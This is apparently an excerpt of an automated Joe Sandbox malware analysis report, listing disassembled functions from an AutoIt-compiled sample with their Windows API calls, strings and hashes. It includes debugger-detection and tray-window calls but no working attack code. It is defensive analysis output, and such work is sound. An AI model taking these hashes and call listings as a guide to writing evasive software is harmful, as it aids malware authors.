                                                      • Opcode ID: 99d2b3fba1ad91c8a14a31f6cf212c0d7017e38111c9fc4a7151d1dea0842366
                                                      • Instruction ID: 756212a319c5967cb5c5d75feff48b3ce83d35158c90f01246975626d28d3b0a
                                                      • Opcode Fuzzy Hash: 99d2b3fba1ad91c8a14a31f6cf212c0d7017e38111c9fc4a7151d1dea0842366
                                                      • Instruction Fuzzy Hash: E001A775A8111867CB04FB90DD62EFF77ACBB56740F140119A40667281EA649E09B7B1
                                                      Function 00F81C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00F83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F83CCA
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F81CC8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 336f461eb22ec16802e8cda9e3176e0c9e31a29535798514bf266b5b52906049
                                                      • Instruction ID: 296a309931e339cfd59f00f33abde824b4ad1b409213a6108764f6ef911db334
                                                      • Opcode Fuzzy Hash: 336f461eb22ec16802e8cda9e3176e0c9e31a29535798514bf266b5b52906049
                                                      • Instruction Fuzzy Hash: AC01A2B5B8012867CB04FBA1DE12AFE73ACAB12740F540115B80273281EA649F09B772
                                                      Function 00FA747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: 3, 3, 16, 1
                                                      • API String ID: 176396367-3042988571
                                                      • Opcode ID: 8d630afbdd6542ead348bdd6566559c40e4a4c1b876464240d732432c805359a
                                                      • Instruction ID: 95f5b1763029c9beb3d09353e7eba526b40dbf814ae845c6e77b53f11e8529f3
                                                      • Opcode Fuzzy Hash: 8d630afbdd6542ead348bdd6566559c40e4a4c1b876464240d732432c805359a
                                                      • Instruction Fuzzy Hash: C6E02B46614320509231327ADCC1E7F6B8DCFCE760710182BFD81D2266EE98DD92B3A1
                                                      Function 00F80B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F80B23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Message
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 2030045667-4017498283
                                                      • Opcode ID: a5e4ea40ed7e4233b8c00cb13931b81f74c08739fd8e56f4b28795a3e2b6818e
                                                      • Instruction ID: 16f13bb8a66049827ea1b11685b48355985dcb14bff04424a8313940cb2161f9
                                                      • Opcode Fuzzy Hash: a5e4ea40ed7e4233b8c00cb13931b81f74c08739fd8e56f4b28795a3e2b6818e
                                                      • Instruction Fuzzy Hash: 6DE0483264435827E21437957C47FCA7E848F05F65F200426FB58955C38EE564947AE9
                                                      Function 00F40D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F3F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F40D71,?,?,?,00F2100A), ref: 00F3F7CE
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00F2100A), ref: 00F40D75
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F2100A), ref: 00F40D84
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F40D7F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 55579361-631824599
                                                      • Opcode ID: 61e2981e7081ce1eadab9da317986c1db0edf4f26a6ef9927b2b5d444223435a
                                                      • Instruction ID: 33f3ed4bf5e7b5d0a84f2a60c9d92b7d53f7c9bf342c876226ddaba39ea85de7
                                                      • Opcode Fuzzy Hash: 61e2981e7081ce1eadab9da317986c1db0edf4f26a6ef9927b2b5d444223435a
                                                      • Instruction Fuzzy Hash: FCE06D706003118BD3209FB9E8447527FF4AF04740F004A2DE982C6652DFB5E448AFA1
                                                      Function 00F7D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: %.3d$X64
                                                      • API String ID: 481472006-1077770165
                                                      • Opcode ID: 064727106af66b40e998ebf7d57e3cbd29ec997401f7a6923032a295a982c572
                                                      • Instruction ID: 8bfdb4e4707b754803ca21ccc08054a4adbef11b079f5d9653d916ba3341c40a
                                                      • Opcode Fuzzy Hash: 064727106af66b40e998ebf7d57e3cbd29ec997401f7a6923032a295a982c572
                                                      • Instruction Fuzzy Hash: 9ED012A2C08109EACB90A6D0DC45ABAB37CAF48311F90C453F90AE1041D624C509FB63
                                                      Function 00FB2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FB236C
                                                      • PostMessageW.USER32(00000000), ref: 00FB2373
                                                        • Part of subcall function 00F8E97B: Sleep.KERNEL32 ref: 00F8E9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 019fb855c170c5ca6f5895c270bc417c10e2dea2b98775655177cd7d9ad4508a
                                                      • Instruction ID: bc029d2ccc84c173ce454c5ca4b72c06ee808f7f49bd5878385f9f741e56f00c
                                                      • Opcode Fuzzy Hash: 019fb855c170c5ca6f5895c270bc417c10e2dea2b98775655177cd7d9ad4508a
                                                      • Instruction Fuzzy Hash: 1DD0A9323C03047AE264B730DC4FFC776049B04B00F000A02B285EA0D0C8E0A8009A84
                                                      Function 00FB2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FB232C
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FB233F
                                                        • Part of subcall function 00F8E97B: Sleep.KERNEL32 ref: 00F8E9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 5e03ea21cd1e97e7809e478c0c40e5159cc756f17fd130c68977de2ca9a054e9
                                                      • Instruction ID: 7345a5599651cf8ed9528f04f0236051d859e4c88bbf15d3bc511329aee748d9
                                                      • Opcode Fuzzy Hash: 5e03ea21cd1e97e7809e478c0c40e5159cc756f17fd130c68977de2ca9a054e9
                                                      • Instruction Fuzzy Hash: D5D0A932380304B6E264B730DC4FFD77A049B00B00F000A02B289AA0D0C8E0A8009A80